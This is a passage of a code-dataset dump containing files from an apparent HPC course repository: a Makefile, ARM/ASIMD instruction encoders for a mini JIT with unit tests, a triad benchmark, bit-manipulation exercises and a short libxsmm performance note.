"e2350759818391a269507338075c861cc268122e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 808, "license_type": "no_license", "max_line_length": 201, "num_lines": 9, "path": "/exercise_6/Makefile", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "BUILD_DIR = ./build\n\ngemm_asm_asmid: driver.cpp ../exercise_4/src/gemm_ref.cpp ../exercise_4/src/util.cpp gemm_asm_asimd_16_4_4.s gemm_asm_asimd_16_4_12.s\n\t\tg++ -g -pedantic -Wall -Wextra -Werror -O2 -c ../exercise_4/src/gemm_ref.cpp -o ${BUILD_DIR}/gemm_ref.o\n\t\tg++ -g -pedantic -Wall -Wextra -Werror -O2 -c ../exercise_4/src/util.cpp -o ${BUILD_DIR}/util.o\n\t\tgcc -g -pedantic -Wall -Wextra -Werror -c gemm_asm_asimd_16_4_4.s -o ${BUILD_DIR}/gemm_asm_asimd_16_4_4.o\n\t\tgcc -g -pedantic -Wall -Wextra -Werror -c gemm_asm_asimd_16_4_12.s -o ${BUILD_DIR}/gemm_asm_asimd_16_4_12.o\n\t\tg++ -g -pedantic -Wall -Wextra -Werror -O2 driver.cpp ${BUILD_DIR}/gemm_ref.o ${BUILD_DIR}/util.o ${BUILD_DIR}/gemm_asm_asimd_16_4_4.o ${BUILD_DIR}/gemm_asm_asimd_16_4_12.o -o ${BUILD_DIR}/driver \n$(shell mkdir -p build)\n \n" }, { "alpha_fraction": 0.6374269127845764, "alphanum_fraction": 0.6432748436927795, "avg_line_length": 18.037036895751953, "blob_id": "887f22e0e4e4551a47641c0cf8ac7b91cf5512cf", "content_id": "3b60c15d3070e22fbb76718a9ffae6fdefe1c6dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 513, "license_type": "no_license", "max_line_length": 75, "num_lines": 27, "path": "/exercise_9/mini_jit_base/src/generators/Simple.h", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#ifndef MINI_JIT_GENERATORS_SIMPLE_H\n#define MINI_JIT_GENERATORS_SIMPLE_H\n\n#include \"../backend/Kernel.h\"\n#include \"../instructions/Base.h\"\n\nnamespace mini_jit {\n namespace generators {\n class Simple;\n }\n}\n\nclass mini_jit::generators::Simple {\n private:\n //! kernel backend\n backend::Kernel m_kernel;\n \n public:\n /**\n * Generates a simple kernel which sets the value three to register w0.\n *\n * @return function pointer to kernel.\n **/\n uint32_t ( *generate() )();\n};\n\n#endif" }, { "alpha_fraction": 0.4201570749282837, "alphanum_fraction": 0.4378272294998169, "avg_line_length": 27.314815521240234, "blob_id": "904285df6dfd5a653c92a93b79fd37d9869929a2", "content_id": "5687a35abc0b6b522ed069a2055514b1237431f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1528, "license_type": "no_license", "max_line_length": 80, "num_lines": 54, "path": "/exercise_9/mini_jit_base/src/generators/Loop.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"Loop.h\"\n\nuint32_t ( *mini_jit::generators::Loop::generate( uint32_t i_nIterations ) )() {\n uint32_t l_ins = 0;\n\n // init output\n l_ins = instructions::Base::dpMovImm( 0,\n 0,\n 0 );\n m_kernel.addInstruction( l_ins );\n\n // set loop counter\n l_ins = instructions::Base::dpMovImm( 1,\n i_nIterations,\n 0 );\n m_kernel.addInstruction( l_ins );\n\n // reset offset\n m_kernel.resetOffset();\n\n // increase output\n l_ins = instructions::Base::dpAddImm( 0,\n 0,\n 1,\n 0 );\n m_kernel.addInstruction( l_ins );\n\n // decrease loop-counter\n l_ins = instructions::Base::dpSubImm( 1,\n 1,\n 1,\n 0 );\n m_kernel.addInstruction( l_ins );\n\n // loop if required\n int32_t l_jumpPc = -m_kernel.getOffset() / 4;\n l_ins = instructions::Base::bCbnz( 1,\n l_jumpPc,\n 0 );\n m_kernel.addInstruction( l_ins );\n\n\n // ret\n l_ins = instructions::Base::bRet();\n m_kernel.addInstruction( l_ins );\n\n // we might debug through file-io\n std::string l_file = \"loop.bin\";\n m_kernel.write( l_file.c_str() );\n\n m_kernel.setKernel();\n\n return (uint32_t (*)()) m_kernel.getKernel();\n}" }, { "alpha_fraction": 0.4536760449409485, "alphanum_fraction": 0.4704124331474304, "avg_line_length": 22.25, "blob_id": "e1ceeba6d26df558a7676ccd2370119475c4c255", "content_id": "d25803befec1c6e367578edb42677a7eb425358d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1673, "license_type": "no_license", "max_line_length": 122, "num_lines": 72, "path": "/exercise_8/triad.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cstdint>\n\nextern \"C\"\n{\n void triad_low( uint64_t i_nValues,\n float const * i_a,\n float const * i_b,\n float * o_c );\n\n}\n\nvoid triad_high( uint64_t i_nValues,\n float const * i_a,\n float const * i_b,\n float * o_c ) {\n for( uint64_t l_va = 0; l_va < i_nValues; l_va++ ) {\n o_c[l_va] = i_a[l_va] + 2.0f * i_b[l_va];\n }\n}\n\nint main(int argc, char** argv)\n{\n if (argc != 2)\n {\n std::cerr << \"Usage: \" << argv[0] << \" nValues\" << std::endl;\n return 0;\n }\n \n uint64_t n_values = atoi(argv[1]);\n\n //allocate Memory\n float* a = new float[n_values];\n float* b = new float[n_values];\n float* c_low = new float[n_values];\n float* c_high = new float[n_values];\n\n //fill a and b with values\n for (uint64_t i = 0; i < n_values; i++)\n {\n a[i] = i;\n b[i] = i % 10;\n }\n\n //run triad\n triad_high(n_values, a, b, c_high);\n\n triad_low(n_values, a, b, c_low);\n\n //compare results\n float max_diff = 0;\n for (uint64_t i = 0; i < n_values; i++)\n {\n max_diff = std::max(max_diff, std::abs(c_low[i] - c_high[i]));\n }\n \n if (max_diff < 10e-6)\n {\n std::cout << \"Compared \" << n_values << \" values and triad_high and triad_low had same results\" << std::endl;\n }\n else\n {\n std::cout << \"Compared \" << n_values << \" values and triad_high and triad_low had different results\" << std::endl;\n }\n\n delete[] a;\n delete[] b;\n delete[] c_low;\n delete[] c_high;\n\n return 0;\n}" }, { "alpha_fraction": 0.3558848202228546, "alphanum_fraction": 0.4112384617328644, "avg_line_length": 28.808332443237305, "blob_id": "c91c697c86993fd7d23d7da46236e4d25990bb3d", "content_id": "80767a122ec5f527233191b4b23dd3f8148106aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3577, "license_type": "no_license", "max_line_length": 87, "num_lines": 120, "path": "/exercise_9/mini_jit_base/src/instructions/Asimd.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"Asimd.h\"\n\nuint32_t mini_jit::instructions::Asimd::lsLdrImmUnsOff( uint8_t i_regSimdDes,\n uint8_t i_regGpAddr,\n regsize_t i_regSize,\n uint16_t i_imm12 ) {\n uint32_t l_ins = 0x3D400000;\n\n l_ins |= 0x1f & i_regSimdDes;\n l_ins |= (0x1f & i_regGpAddr) << 5;\n l_ins |= (0xfff & i_imm12) << 10;\n\n uint8_t l_opc = 0b01;\n if( i_regSize == regsize_t::q ) {\n l_opc = 0b11;\n }\n l_ins |= l_opc << 22;\n\n uint8_t l_size = 0;\n if( i_regSize == regsize_t::h ) {\n l_size = 0b01;\n }\n else if( i_regSize == regsize_t::s ) {\n l_size = 0b10;\n }\n else if( i_regSize == regsize_t::d ) {\n l_size = 0b11;\n }\n l_ins |= l_size << 30;\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Asimd::lsStrImmUnsOff( uint8_t i_regSimdDes,\n uint8_t i_regGpAddr,\n regsize_t i_regSize,\n uint16_t i_imm12 ) {\n uint32_t l_ins = lsLdrImmUnsOff( i_regSimdDes,\n i_regGpAddr,\n i_regSize,\n i_imm12 );\n l_ins &= ~(0b1 << 22);\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Asimd::lsLd1MultipleNoOff( uint8_t i_regSimdDes,\n uint8_t i_regGpAddr,\n arrspec_t i_arrSpec,\n uint8_t i_nStructures ) {\n uint32_t l_ins = 0xC402000;\n\n l_ins |= 0x1f & i_regSimdDes;\n l_ins |= (0x1f & i_regGpAddr) << 5;\n\n if( i_arrSpec == arrspec_t::s2 ) {\n l_ins |= 0b10 << 10;\n l_ins |= 0b0 << 30;\n }\n else if( i_arrSpec == arrspec_t::s4 ) {\n l_ins |= 0b10 << 10;\n l_ins |= 0b1 << 30;\n }\n else if( i_arrSpec == arrspec_t::d2 ) {\n l_ins |= 0b11 << 10;\n l_ins |= 0b1 << 30;\n }\n\n uint8_t l_opCode = 0;\n if( i_nStructures == 1 ) {\n l_opCode = 0b0111;\n }\n else if( i_nStructures == 2 ) {\n l_opCode = 0b1010;\n }\n else if( i_nStructures == 3 ) {\n l_opCode = 0b0110;\n }\n else {\n l_opCode = 0b0010;\n }\n l_ins |= l_opCode << 12;\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Asimd::lsSt1MultipleNoOff( uint8_t i_regSimdDes,\n uint8_t i_regGpAddr,\n arrspec_t i_arrSpec,\n uint8_t i_nStructures ) {\n uint32_t l_ins = lsLd1MultipleNoOff( i_regSimdDes,\n i_regGpAddr,\n i_arrSpec,\n i_nStructures );\n l_ins &= ~(0b1 << 22);\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Asimd::dpFmovVectorImm( uint8_t i_regSimdDes,\n uint8_t i_imm8,\n arrspec_t i_arrSpec ) {\n uint32_t l_ins = 0xf00f400;\n\n l_ins |= 0x1f & i_regSimdDes;\n\n // set a, b, c\n l_ins |= (0b111 & (i_imm8 >> 5)) << 16;\n // set d, e, f, g, h\n l_ins |= (0b11111 & i_imm8) << 5;\n\n if( i_arrSpec == arrspec_t::s4 || i_arrSpec == arrspec_t::d2 ) {\n l_ins |= 0x1 << 30;\n }\n if( i_arrSpec == arrspec_t::d2 ) {\n l_ins |= 0x1 << 29;\n }\n\n return l_ins;\n}\n" }, { "alpha_fraction": 0.5174376964569092, "alphanum_fraction": 0.5238434076309204, "avg_line_length": 32.4523811340332, "blob_id": "a5d8d0a8e03be732c9005d56494e575748cc0d4f", "content_id": "5c47b4205ee291f048125468dfe5dcd7c406509a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1405, "license_type": "no_license", "max_line_length": 64, "num_lines": 42, "path": "/exercise_9/mini_jit_base/src/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include \"generators/Simple.h\"\n#include \"generators/Loop.h\"\n#include \"generators/MyExample.h\"\n\nint main() {\n std::cout << \"###########################\" << std::endl;\n std::cout << \"### welcome to mini_jit ###\" << std::endl;\n std::cout << \"###########################\" << std::endl;\n\n std::cout << \"simple:\" << std::endl;\n std::cout << \" generating simple kernel\" << std::endl;\n mini_jit::generators::Simple l_simple;\n uint32_t (* l_funcSimple)() = l_simple.generate();\n\n std::cout << \" running\" << std::endl;\n std::cout << \" result: \" << l_funcSimple() << std::endl;\n\n\n std::cout << \"loop:\" << std::endl;\n std::cout << \" generating\" << std::endl;\n mini_jit::generators::Loop l_loop;\n uint32_t (* l_funcLoop)() = l_loop.generate( 32 );\n\n std::cout << \" running\" << std::endl;\n std::cout << \" result: \" << l_funcLoop() << std::endl;\n\n std::cout << \"MyExample (factorial):\" << std::endl;\n std::cout << \" generating\" << std::endl;\n mini_jit::generators::MyExample l_myExample;\n uint32_t (* l_funcMyExample)() = l_myExample.generate( 4 );\n\n std::cout << \" running\" << std::endl;\n std::cout << \" result: \" << l_funcMyExample() << std::endl;\n\n\n std::cout << \"##############################\" << std::endl;\n std::cout << \"### mini_jit says bye, bye ###\" << std::endl;\n std::cout << \"##############################\" << std::endl;\n\n return EXIT_SUCCESS;\n}\n" }, { "alpha_fraction": 0.5385255217552185, "alphanum_fraction": 0.5557095408439636, "avg_line_length": 33.69230651855469, "blob_id": "29b7186fde0449cc4863af3c17ae70a98f301de1", "content_id": "6e064cabd14ebe9ac5d002e539aebd6dcd408a2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3608, "license_type": "no_license", "max_line_length": 99, "num_lines": 104, "path": "/exercise_9/mini_jit_base/src/instructions/Asimd.h", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#ifndef MINI_JIT_INSTRUCTIONS_ASIMD_H\n#define MINI_JIT_INSTRUCTIONS_ASIMD_H\n\n#include <cstdint>\n\nnamespace mini_jit {\n namespace instructions {\n class Asimd;\n }\n}\n\nclass mini_jit::instructions::Asimd {\n public:\n //! arrangement specifiers\n enum arrspec_t: char {\n s2 = 0,\n s4 = 1,\n d2 = 2\n };\n\n //! register sizes\n enum regsize_t: char {\n b = 0,\n h = 1,\n s = 2,\n d = 3,\n q = 4\n };\n\n /**\n * Gets the machine code for load SIMD&FP register (immediate offset, unsigned offset)\n *\n * @param i_regSimdDes SIMD&FP destination register.\n * @param i_regGpAddr general purpose register holding the address from which data is loaded.\n * @param i_regSize size of of register to which data is loaded.\n * @param i_imm12 value of the 12-bit immediate.\n *\n * @return instruction.\n **/\n static uint32_t lsLdrImmUnsOff( uint8_t i_regSimdDes,\n uint8_t i_regGpAddr,\n regsize_t i_regSize,\n uint16_t i_imm12 );\n\n /**\n * Gets the machine code for store SIMD&FP register (immediate offset, unsigned offset)\n *\n * @param i_regSimdDes SIMD&FP destination register.\n * @param i_regGpAddr general purpose register holding the address to which the data is stored.\n * @param i_regSize size of register whose data is stored.\n * @param i_imm12 value of the 12-bit immediate.\n *\n * @return instruction.\n **/\n static uint32_t lsStrImmUnsOff( uint8_t i_regSimdDes,\n uint8_t i_regGpAddr,\n regsize_t i_regSize,\n uint16_t i_imm12 );\n\n /**\n * Gets the machine code for load multiple structures (no offset).\n *\n * @param i_regSimdDes first or only SIMD&FP destination register.\n * @param i_regGpAddr general purpose register holding the address from which data is loaded.\n * @param i_arrSpec arrangement specifier.\n * @param i_nStructures number of structures which are loaded. 1, 2, 3 or 4.\n *\n * @return instruction.\n **/\n static uint32_t lsLd1MultipleNoOff( uint8_t i_regSimdDes,\n uint8_t i_regGpAddr,\n arrspec_t i_arrSpec,\n uint8_t i_nStructures );\n\n /**\n * Gets the machine code for store multiple structures (no offset).\n *\n * @param i_regSimdDes first or only SIMD&FP destination register.\n * @param i_regGpAddr general purpose register holding the address to where the data is stored.\n * @param i_arrSpec arrangement specifier.\n * @param i_nStructures number of structures which are stored. 1, 2, 3 or 4.\n *\n * @return instruction.\n **/\n static uint32_t lsSt1MultipleNoOff( uint8_t i_regSimdDes,\n uint8_t i_regGpAddr,\n arrspec_t i_arrSpec,\n uint8_t i_nStructures );\n\n /**\n * Gets the machine code for floating-point move immediate (vector).\n *\n * @param i_regSimdDes SIMD&FP destination register.\n * @param i_imm8 value of the 8-bit immediate.\n * @param i_arrSpec arrangement specifier.\n *\n * @return instruction.\n **/\n static uint32_t dpFmovVectorImm( uint8_t i_regSimdDes,\n uint8_t i_imm8,\n arrspec_t i_arrSpec );\n};\n\n#endif\n" }, { "alpha_fraction": 0.4390243887901306, "alphanum_fraction": 0.496515691280365, "avg_line_length": 25.090909957885742, "blob_id": "ec0ef9a136905599c81c62f724f1ed0381c7e76b", "content_id": "ae6cd66667dfa704405bb05991dbab1c84fb4a13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 574, "license_type": "no_license", "max_line_length": 61, "num_lines": 22, "path": "/exercise_5/task1/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <iostream>\n\nextern \"C\" {\n int32_t load_store_0( int32_t const * i_a);\n void load_store_1( uint64_t const * i_a, uint64_t * o_b);\n void load_store_2( int64_t const * i_a, int64_t * o_b);\n void load_store_3();\n}\n\nint main(int i_argc, char * i_argv[])\n{\n // first example\n int32_t l_data0 = 7743;\n int32_t * l_ptr0 = &l_data0;\n \n std::cout << \"l_data0 / l_ptr0 / return value: \"\n << l_data0 << \" / \"\n << l_ptr0 << \" / \"\n << load_store_0( l_ptr0 )\n << std::endl;\n return EXIT_SUCCESS;\n}\n" }, { "alpha_fraction": 0.7581903338432312, "alphanum_fraction": 0.7737909555435181, "avg_line_length": 52.25, "blob_id": "a03132c12ed1215d0cfb334be7444f7b5fd724e8", "content_id": "efc2b40598cbc52961aa97ac8dde5ba0a5c20296", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 641, "license_type": "no_license", "max_line_length": 206, "num_lines": 12, "path": "/exercise_4/solution_4_4.md", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "## Explain the call\n\nThe call of libxsmm_dmmdispatch dispatches the just in time code generation. It returns a function pointer to an optimized, generated kernel. With the call of the kernel the optimized code gets executed. \n\n## Compile \n\ng++ -O3 -DNDEBUG -I/home/markus/lib/libxsmm/include src/driver_4_4.cpp src/gemm_ref.cpp src/util.cpp -pthread -lxsmm -L${HOME}/lib/libxsmm/lib /lib64/libopenblas.so.0 -ldl -o driver_4_4\n\n\n## Performance\n\nCompared with our reference kernel implementation the libxsmm implementation performs significantly better. We get at least ten times the number of FLOPS with a peak performance of ~32 GFLOPS. \n" }, { "alpha_fraction": 0.4806629717350006, "alphanum_fraction": 0.4806629717350006, "avg_line_length": 24.85714340209961, "blob_id": "81b8851b989604307ebc65619737e6b2aeaf8b3e", "content_id": "c3e4a1b8abb46a2265bb51357f8f62536d9e1b86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 362, "license_type": "no_license", "max_line_length": 34, "num_lines": 14, "path": "/exercise_4/src/gemm_ref.hpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#ifndef GEMM_REF_HPP\n#define GEMM_REF_HPP\n\nvoid gemm_ref(float const* i_a,\n float const* i_b,\n float * io_c,\n unsigned int i_m,\n unsigned int i_n,\n unsigned int i_k,\n unsigned int i_lda,\n unsigned int i_ldb,\n unsigned int i_ldc);\n\n#endif //GEMM_REF_HPP\n" }, { "alpha_fraction": 0.3549405336380005, "alphanum_fraction": 0.4078660011291504, "avg_line_length": 43.7717399597168, "blob_id": "65a93c0213f8619bc1e3b54456028e36513876db", "content_id": "0be1077c4876add82e8e906be53e280a14f4e6b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4119, "license_type": "no_license", "max_line_length": 95, "num_lines": 92, "path": "/exercise_9/mini_jit_base/src/instructions/Asimd.test.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <catch2/catch.hpp>\n#include \"Asimd.h\"\n\nTEST_CASE( \"Tests lsLdrImmUnsOff.\", \"[Asimd][lsLdrImmUnsOff]\" ) {\n uint32_t l_ins = 0;\n mini_jit::instructions::Asimd::regsize_t l_rs = mini_jit::instructions::Asimd::regsize_t::b;\n l_ins = mini_jit::instructions::Asimd::lsLdrImmUnsOff( 0,\n 0,\n l_rs,\n 0 );\n REQUIRE( l_ins == 0x3d400000 );\n\n l_rs = mini_jit::instructions::Asimd::regsize_t::q;\n l_ins = mini_jit::instructions::Asimd::lsLdrImmUnsOff( 2,\n 4,\n l_rs,\n 32 );\n REQUIRE( l_ins == 0x3dc08082 );\n}\n\nTEST_CASE( \"Tests lsStrImmUnsOff.\", \"[Asimd][lsStrImmUnsOff]\" ) {\n uint32_t l_ins = 0;\n mini_jit::instructions::Asimd::regsize_t l_rs = mini_jit::instructions::Asimd::regsize_t::s;\n l_ins = mini_jit::instructions::Asimd::lsStrImmUnsOff( 1,\n 0,\n l_rs,\n 64 );\n REQUIRE( l_ins == 0xbd010001 );\n}\n\nTEST_CASE( \"Tests lsLd1MultipleNoOff.\", \"[Asimd][lsLd1MultipleNoOff]\" ) {\n uint32_t l_ins = 0;\n mini_jit::instructions::Asimd::arrspec_t l_as = mini_jit::instructions::Asimd::arrspec_t::s4;\n\n l_ins = mini_jit::instructions::Asimd::lsLd1MultipleNoOff( 0,\n 0,\n l_as,\n 4 );\n REQUIRE( l_ins == 0x4c402800 );\n\n l_ins = mini_jit::instructions::Asimd::lsLd1MultipleNoOff( 3,\n 7,\n l_as,\n 2 );\n REQUIRE( l_ins == 0x4c40a8e3 );\n\n l_as = mini_jit::instructions::Asimd::arrspec_t::d2;\n l_ins = mini_jit::instructions::Asimd::lsLd1MultipleNoOff( 9,\n 2,\n l_as,\n 1 );\n REQUIRE( l_ins == 0x4c407c49 );\n}\n\nTEST_CASE( \"Tests lsSt1MultipleNoOff.\", \"[Asimd][lsLd1MultipleNoOff]\" ) {\n uint32_t l_ins = 0;\n mini_jit::instructions::Asimd::arrspec_t l_as = mini_jit::instructions::Asimd::arrspec_t::s2;\n l_ins = mini_jit::instructions::Asimd::lsSt1MultipleNoOff( 2,\n 5,\n l_as,\n 3 );\n REQUIRE( l_ins == 0x0c0068a2 );\n}\n\nTEST_CASE( \"Tests dpFmovVectorImm.\", \"[Asimd][dpFmovVectorImm]\" ) {\n uint32_t l_ins = 0;\n mini_jit::instructions::Asimd::arrspec_t l_as = mini_jit::instructions::Asimd::arrspec_t::s4;\n\n // fmov\tv0.4s, #2.000000000000000000e+00\n uint8_t l_imm = 0;\n l_ins = mini_jit::instructions::Asimd::dpFmovVectorImm( 0,\n l_imm,\n l_as );\n REQUIRE( l_ins == 0x4f00f400 );\n\n // fmov\tv5.2d, #-2.000000000000000000e+00\n l_imm = 0b10000000;\n l_as = mini_jit::instructions::Asimd::arrspec_t::d2;\n l_ins = mini_jit::instructions::Asimd::dpFmovVectorImm( 5,\n l_imm,\n l_as );\n REQUIRE( l_ins == 0x6f04f405 );\n\n // fmov\tv17.2s, #1.000000000000000000e+00\n l_imm = 0b01110000;\n l_as = mini_jit::instructions::Asimd::arrspec_t::s2;\n l_ins = mini_jit::instructions::Asimd::dpFmovVectorImm( 17,\n l_imm,\n l_as );\n REQUIRE( l_ins == 0x0f03f611 );\n\n}\n" }, { "alpha_fraction": 0.46840083599090576, "alphanum_fraction": 0.5661662220954895, "avg_line_length": 44.11023712158203, "blob_id": "67a0f468fde08c97630ac41a3276e2504325b3d3", "content_id": "7df346bb9ec88d6e5488b650a413adc94f5e5aa2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5728, "license_type": "no_license", "max_line_length": 158, "num_lines": 127, "path": "/exercise_2/exercise.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "//\n// Created by markus on 4/22/21.\n//\n#include <iostream>\n#include <bitset>\n\nunsigned int instruction_asimd_compute( unsigned int i_vec_instr,\n unsigned char i_vec_reg_dst,\n unsigned char i_vec_reg_src_0,\n unsigned char i_vec_reg_src_1 );\n\nint main()\n{\n std::cout << \"bit patterns\" << std::endl << \"#############\" << std::endl;\n unsigned char l_data1 = 1;\n std::cout << \"unsigned char l_data1 = 1: \" << std::bitset<8>(l_data1) << std::endl;\n\n unsigned char l_data2 = 255;\n std::cout << \"unsigned char l_data2 = 255: \" << std::bitset<8>(l_data2) << std::endl;\n\n unsigned char l_data3 = l_data2 + 1;\n std::cout << \"unsigned char l_data3 = l_data2 + 1:\" << std::bitset<8>(l_data3) << std::endl;\n\n unsigned char l_data4 = 0xA1;\n std::cout << \"unsigned char l_data4 = 0xA1: \" << std::bitset<8>(l_data4) << std::endl;\n\n unsigned char l_data5 = 0b1001011;\n std::cout << \"unsigned char l_data5 = 0b1001011: \" << std::bitset<8>(l_data5) << std::endl;\n\n unsigned char l_data6 = 'H';\n std::cout << \"unsigned char l_data6 = 'H': \" << std::bitset<8>(l_data6) << std::endl;\n\n char l_data7 = -4;\n std::cout << \"char l_data7 = -4: \" << std::bitset<8>(l_data7) << std::endl;\n\n unsigned int l_data8 = 1u << 11;\n std::cout << \"unsigned int l_data8 = 1u << 11: \" << std::bitset<32>(l_data8) << std::endl;\n\n unsigned int l_data9 = l_data8 << 21;\n std::cout << \"unsigned int l_data9 = l_data8 << 21: \" << std::bitset<32>(l_data9) << std::endl;\n\n unsigned int l_data10 = 0xFFFFFFFF >> 5;\n std::cout << \"unsigned int l_data10 = 0xFFFFFFFF >> 5: \" << std::bitset<32>(l_data10) << std::endl;\n\n unsigned int l_data11 = 0b1001 ^ 0b01111;\n std::cout << \"unsigned int l_data11 = 0b1001 ^ 0b01111: \" << std::bitset<32>(l_data11) << std::endl;\n\n unsigned int l_data12 = ~0b1001;\n std::cout << \"unsigned int l_data12 = ~0b1001: \" << std::bitset<32>(l_data12) << std::endl;\n\n unsigned int l_data13 = 0xF0 & 0b1010101;\n std::cout << \"unsigned int l_data13 = 0xF0 & 0b1010101: \" << std::bitset<32>(l_data13) << std::endl;\n\n unsigned int l_data14 = 0b001 | 0b101;\n std::cout << \"unsigned int l_data14 = 0b001 | 0b101: \" << std::bitset<32>(l_data14) << std::endl;\n\n unsigned int l_data15 = 7743;\n std::cout << \"unsigned int l_data15 = 7743: \" << std::bitset<32>(l_data15) << std::endl;\n\n int l_data16 = -7743;\n std::cout << \"int l_data16 = -7743: \" << std::bitset<32>(l_data16) << std::endl;\n\n std::cout << \"#############\" << std::endl << std::endl;\n\n std::cout << \"Testing instruction_asimd_compute:\" << std::endl;\n std::cout << \"Test case 1: \";\n\n unsigned int i_vec_instr = 0b01001110001000001100110000000000;\n //0b01001110001000101100110000100000\n unsigned char i_vec_reg_dst = 0b00000000;\n unsigned char i_vec_reg_src_0 = 0b00000001;\n unsigned char i_vec_reg_src_1 = 0b00000010;\n unsigned int result = 0b01001110001000101100110000100000;\n\n if (instruction_asimd_compute(i_vec_instr, i_vec_reg_dst, i_vec_reg_src_0, i_vec_reg_src_1) == result)\n std::cout << \"Success!\" << std::endl;\n else\n {\n std::cout << \"Failed!\" << std::endl;\n std::cout << \"expected:\" << std::bitset<32>(result) << std::endl;\n std::cout << \"received:\" << std::bitset<32>(instruction_asimd_compute(i_vec_instr, i_vec_reg_dst, i_vec_reg_src_0, i_vec_reg_src_1)) << std::endl;\n }\n\n std::cout << \"Test case 2: \";\n i_vec_instr = 0;\n i_vec_reg_dst = 0xFF;\n i_vec_reg_src_0 = 0xFF;\n i_vec_reg_src_1 = 0xFF;\n result = 0b00000000000111110000001111111111;\n if (instruction_asimd_compute(i_vec_instr, i_vec_reg_dst, i_vec_reg_src_0, i_vec_reg_src_1) == result)\n std::cout << \"Success!\" << std::endl;\n else\n {\n std::cout << \"Failed!\" << std::endl;\n std::cout << \"expected:\" << std::bitset<32>(result) << std::endl;\n std::cout << \"received:\" << std::bitset<32>(instruction_asimd_compute(i_vec_instr, i_vec_reg_dst, i_vec_reg_src_0, i_vec_reg_src_1)) << std::endl;\n }\n\n std::cout << \"Test case 3: \";\n i_vec_instr = 0b01010101010101010101010101010101;\n i_vec_reg_dst = 0b00001010;\n i_vec_reg_src_0 = 0b00011111;\n i_vec_reg_src_1 = 0b00000000;\n result = 0b01010101010000000101011111101010;\n if (instruction_asimd_compute(i_vec_instr, i_vec_reg_dst, i_vec_reg_src_0, i_vec_reg_src_1) == result)\n std::cout << \"Success!\" << std::endl;\n else\n {\n std::cout << \"Failed!\" << std::endl;\n std::cout << \"expected:\" << std::bitset<32>(result) << std::endl;\n std::cout << \"received:\" << std::bitset<32>(instruction_asimd_compute(i_vec_instr, i_vec_reg_dst, i_vec_reg_src_0, i_vec_reg_src_1)) << std::endl;\n }\n\n\n}\n\nunsigned int instruction_asimd_compute( unsigned int i_vec_instr,\n unsigned char i_vec_reg_dst,\n unsigned char i_vec_reg_src_0,\n unsigned char i_vec_reg_src_1 )\n{\n //Idee erst mit Bitmaske entsprechende Elemente in i_vec_instr auf 0 setzen\n //dann oder mit entsprechenden parameter bits\n return (i_vec_instr & ~0x001F03FF) | (i_vec_reg_dst & 0x1F) //Bits 0-4 should be set to bits 0-4 of i_vec_reg_dst\n | ((static_cast<unsigned int>(i_vec_reg_src_0) & 0x1F) << 5) //Bits 5-9 should be set to bits 0-4 of i_vec_reg_src_0\n | ((static_cast<unsigned int>(i_vec_reg_src_1) & 0x1F) << 16); //Bits 16-20 should be set to bits 0-4 of i_vec_reg_src_1\n}" }, { "alpha_fraction": 0.45584726333618164, "alphanum_fraction": 0.5107398629188538, "avg_line_length": 13.448275566101074, "blob_id": "b42be9e3e501cb903b884c2c29cef72642d71cb5", "content_id": "738eaa71f28021634056315adf63612639f8283e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 419, "license_type": "no_license", "max_line_length": 53, "num_lines": 29, "path": "/exercise_5/task2/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <cstdint>\n#include <cstdlib>\n\nextern \"C\" {\n void load_asm( uint64_t const * i_a );\n}\n\nint main() {\n uint64_t * l_a = new uint64_t[10];\n for( unsigned short l_va = 0; l_va < 10; l_va++ ) {\n l_a[l_va] = (l_va+1)*100;\n }\n\n // ok\n load_asm( l_a+2 );\n\n // not ok #1\n load_asm( l_a+12 );\n\n // not ok #2\n load_asm( l_a+8 );\n\n // not ok #3\n load_asm( l_a+6 );\n\n delete[] l_a;\n\n return EXIT_SUCCESS;\n}\n" }, { "alpha_fraction": 0.6649852991104126, "alphanum_fraction": 0.7183690667152405, "avg_line_length": 47.53061294555664, "blob_id": "865d088758e24e3d528c40c2abfa26635026769e", "content_id": "70137ec5b4bc1f8537bc4c3a244629b7d09fd857", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2379, "license_type": "no_license", "max_line_length": 283, "num_lines": 49, "path": "/exercise_5/solution.md", "repo_name": 